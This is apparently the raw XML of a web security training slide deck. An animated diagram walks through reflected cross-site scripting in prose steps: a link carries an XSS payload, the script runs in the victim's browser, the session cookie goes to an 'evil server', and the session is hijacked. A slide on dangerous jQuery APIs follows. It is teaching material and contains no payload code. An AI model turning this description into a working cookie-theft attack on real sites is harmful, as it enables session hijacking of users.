                  <a:pt x="157" y="2188"/>
                  <a:pt x="157" y="2188"/>
                  <a:pt x="157" y="2188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2188"/>
                  <a:pt x="1218" y="2188"/>
                  <a:pt x="1218" y="2188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2094"/>
                  <a:pt x="1218" y="2094"/>
                  <a:pt x="1218" y="2094"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="157" y="2094"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="157" y="156"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="157" y="156"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="250"/>
                  <a:pt x="157" y="250"/>
                  <a:pt x="157" y="250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="250"/>
                  <a:pt x="1218" y="250"/>
                  <a:pt x="1218" y="250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="156"/>
                  <a:pt x="1218" y="156"/>
                  <a:pt x="1218" y="156"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="157" y="156"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="157" y="2250"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="157" y="2250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="2344"/>
                  <a:pt x="157" y="2344"/>
                  <a:pt x="157" y="2344"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2344"/>
                  <a:pt x="1218" y="2344"/>
                  <a:pt x="1218" y="2344"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2250"/>
                  <a:pt x="1218" y="2250"/>
                  <a:pt x="1218" y="2250"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="157" y="2250"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="157" y="2406"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="157" y="2406"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="2500"/>
                  <a:pt x="157" y="2500"/>
                  <a:pt x="157" y="2500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2500"/>
                  <a:pt x="1218" y="2500"/>
                  <a:pt x="1218" y="2500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1218" y="2406"/>
                  <a:pt x="1218" y="2406"/>
                  <a:pt x="1218" y="2406"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="157" y="2406"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="624" y="469"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="624" y="469"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="624" y="500"/>
                  <a:pt x="656" y="531"/>
                  <a:pt x="687" y="531"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="718" y="531"/>
                  <a:pt x="749" y="500"/>
                  <a:pt x="749" y="469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="749" y="438"/>
                  <a:pt x="718" y="406"/>
                  <a:pt x="687" y="406"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="656" y="406"/>
                  <a:pt x="624" y="438"/>
                  <a:pt x="624" y="469"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Freeform 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4183375" y="1367894"/>
            <a:ext cx="939688" cy="515088"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 18249 w 23031"/>
              <a:gd name="T1" fmla="*/ 6968 h 12625"/>
              <a:gd name="T2" fmla="*/ 18249 w 23031"/>
              <a:gd name="T3" fmla="*/ 6968 h 12625"/>
              <a:gd name="T4" fmla="*/ 16562 w 23031"/>
              <a:gd name="T5" fmla="*/ 0 h 12625"/>
              <a:gd name="T6" fmla="*/ 11500 w 23031"/>
              <a:gd name="T7" fmla="*/ 875 h 12625"/>
              <a:gd name="T8" fmla="*/ 6469 w 23031"/>
              <a:gd name="T9" fmla="*/ 0 h 12625"/>
              <a:gd name="T10" fmla="*/ 4781 w 23031"/>
              <a:gd name="T11" fmla="*/ 6968 h 12625"/>
              <a:gd name="T12" fmla="*/ 0 w 23031"/>
              <a:gd name="T13" fmla="*/ 9499 h 12625"/>
              <a:gd name="T14" fmla="*/ 4438 w 23031"/>
              <a:gd name="T15" fmla="*/ 11968 h 12625"/>
              <a:gd name="T16" fmla="*/ 11500 w 23031"/>
              <a:gd name="T17" fmla="*/ 12624 h 12625"/>
              <a:gd name="T18" fmla="*/ 18593 w 23031"/>
              <a:gd name="T19" fmla="*/ 11968 h 12625"/>
              <a:gd name="T20" fmla="*/ 23030 w 23031"/>
              <a:gd name="T21" fmla="*/ 9499 h 12625"/>
              <a:gd name="T22" fmla="*/ 18249 w 23031"/>
              <a:gd name="T23" fmla="*/ 6968 h 1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31" h="12625">
                <a:moveTo>
                  <a:pt x="18249" y="6968"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18249" y="6968"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17905" y="4313"/>
                  <a:pt x="17312" y="1938"/>
                  <a:pt x="16562" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14968" y="563"/>
                  <a:pt x="13280" y="875"/>
                  <a:pt x="11500" y="875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9750" y="875"/>
                  <a:pt x="8063" y="563"/>
                  <a:pt x="6469" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5719" y="1938"/>
                  <a:pt x="5125" y="4313"/>
                  <a:pt x="4781" y="6968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1875" y="7531"/>
                  <a:pt x="0" y="8468"/>
                  <a:pt x="0" y="9499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="10499"/>
                  <a:pt x="1750" y="11406"/>
                  <a:pt x="4438" y="11968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6375" y="12374"/>
                  <a:pt x="8844" y="12624"/>
                  <a:pt x="11500" y="12624"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14186" y="12624"/>
                  <a:pt x="16655" y="12374"/>
                  <a:pt x="18593" y="11968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21280" y="11406"/>
                  <a:pt x="23030" y="10499"/>
                  <a:pt x="23030" y="9499"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23030" y="8468"/>
                  <a:pt x="21124" y="7531"/>
                  <a:pt x="18249" y="6968"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2414936" y="2456590"/>
            <a:ext cx="1046769" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacker sends link to victim. Link contains XSS payload.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Oval 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3848428" y="1950810"/>
            <a:ext cx="436880" cy="436880"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61" name="Straight Connector 60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipH="1">
            <a:off x="1063631" y="4218478"/>
            <a:ext cx="2296447" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="DB3D16"/>
            </a:solidFill>
            <a:headEnd type="oval" w="sm" len="sm"/>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bwMode="gray">
          <a:xfrm>
            <a:off x="1124590" y="4294678"/>
            <a:ext cx="965488" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim views page via XSS link supplied by Hacker.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Oval 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626751" y="4000038"/>
            <a:ext cx="436880" cy="436880"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2213805" y="4127796"/>
            <a:ext cx="674291" cy="782109"/>
            <a:chOff x="2139950" y="2465386"/>
            <a:chExt cx="506413" cy="587385"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2139950" y="2871796"/>
              <a:ext cx="506413" cy="180975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 687 w 1407"/>
                <a:gd name="T1" fmla="*/ 0 h 501"/>
                <a:gd name="T2" fmla="*/ 687 w 1407"/>
                <a:gd name="T3" fmla="*/ 0 h 501"/>
                <a:gd name="T4" fmla="*/ 1406 w 1407"/>
                <a:gd name="T5" fmla="*/ 219 h 501"/>
                <a:gd name="T6" fmla="*/ 1406 w 1407"/>
                <a:gd name="T7" fmla="*/ 469 h 501"/>
                <a:gd name="T8" fmla="*/ 1406 w 1407"/>
                <a:gd name="T9" fmla="*/ 500 h 501"/>
                <a:gd name="T10" fmla="*/ 0 w 1407"/>
                <a:gd name="T11" fmla="*/ 500 h 501"/>
                <a:gd name="T12" fmla="*/ 0 w 1407"/>
                <a:gd name="T13" fmla="*/ 406 h 501"/>
                <a:gd name="T14" fmla="*/ 0 w 1407"/>
                <a:gd name="T15" fmla="*/ 219 h 501"/>
                <a:gd name="T16" fmla="*/ 687 w 1407"/>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7" h="501">
                  <a:moveTo>
                    <a:pt x="687" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="687" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1094" y="0"/>
                    <a:pt x="1406" y="125"/>
                    <a:pt x="1406" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1406" y="219"/>
                    <a:pt x="1406" y="219"/>
                    <a:pt x="1406" y="469"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1406" y="500"/>
                    <a:pt x="1406" y="500"/>
                    <a:pt x="1406" y="500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="500"/>
                    <a:pt x="0" y="500"/>
                    <a:pt x="0" y="500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="406"/>
                    <a:pt x="0" y="406"/>
                    <a:pt x="0" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="344"/>
                    <a:pt x="0" y="281"/>
                    <a:pt x="0" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="125"/>
                    <a:pt x="312" y="0"/>
                    <a:pt x="687"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Autofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2195513" y="2465386"/>
              <a:ext cx="393700" cy="382588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1095"/>
                <a:gd name="T1" fmla="*/ 531 h 1064"/>
                <a:gd name="T2" fmla="*/ 0 w 1095"/>
                <a:gd name="T3" fmla="*/ 531 h 1064"/>
                <a:gd name="T4" fmla="*/ 563 w 1095"/>
                <a:gd name="T5" fmla="*/ 0 h 1064"/>
                <a:gd name="T6" fmla="*/ 1094 w 1095"/>
                <a:gd name="T7" fmla="*/ 531 h 1064"/>
                <a:gd name="T8" fmla="*/ 563 w 1095"/>
                <a:gd name="T9" fmla="*/ 1063 h 1064"/>
                <a:gd name="T10" fmla="*/ 0 w 1095"/>
                <a:gd name="T11" fmla="*/ 531 h 1064"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1095" h="1064">
                  <a:moveTo>
                    <a:pt x="0" y="531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="531"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="219"/>
                    <a:pt x="250" y="0"/>
                    <a:pt x="563" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="844" y="0"/>
                    <a:pt x="1094" y="219"/>
                    <a:pt x="1094" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1094" y="844"/>
                    <a:pt x="844" y="1063"/>
                    <a:pt x="563" y="1063"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="1063"/>
                    <a:pt x="0" y="844"/>
                    <a:pt x="0" y="5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noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="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020" y="3656890"/>
            <a:ext cx="638698" cy="6377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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70" name="Straight Connector 69"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4053840" y="4603950"/>
            <a:ext cx="2072640" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DB3D16"/>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bwMode="gray">
          <a:xfrm>
            <a:off x="4530060" y="4731919"/>
            <a:ext cx="1418340" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS code executes on Victim’s browser and sends cookie</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>to evil server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Oval 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4047485" y="4377820"/>
            <a:ext cx="436880" cy="436880"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>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en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="78" name="Straight Connector 77"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5165765" y="2074953"/>
            <a:ext cx="1168400" cy="1553344"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DB3D16"/>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bwMode="gray">
          <a:xfrm>
            <a:off x="5668822" y="2068496"/>
            <a:ext cx="1435635" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie is stolen. Hacker can hijack the Victim’s session.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Oval 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6012098" y="3254597"/>
            <a:ext cx="436880" cy="436880"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="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315" y="3681144"/>
            <a:ext cx="638698" cy="6377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927247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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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10"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par>
                                <p:cTn id="42" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00018 0.0037 L 0.18229 0.0037 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="9115" y="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down)">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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 presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>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90"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="60" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -5.55556E-7 2.22222E-6 L -0.13888 -0.25255 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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animBg="1"/>
      <p:bldP spid="62" grpId="0"/>
      <p:bldP spid="63" grpId="0" animBg="1"/>
      <p:bldP spid="75" grpId="0"/>
      <p:bldP spid="76" grpId="0" animBg="1"/>
      <p:bldP spid="86" grpId="0"/>
      <p:bldP spid="8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0694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> APIs and XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>90</a:t>
            </a:fld>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3505060408"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1474466"/>
          <a:ext cx="8229600" cy="986217"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1830853">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6398747">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="32873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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Dangerous </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>jQuery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> 1.7.2 Data Types</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="1828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28739">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n-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>CSS</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="1828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n-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Some attribute</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> settings</a:t>
                      </a:r>
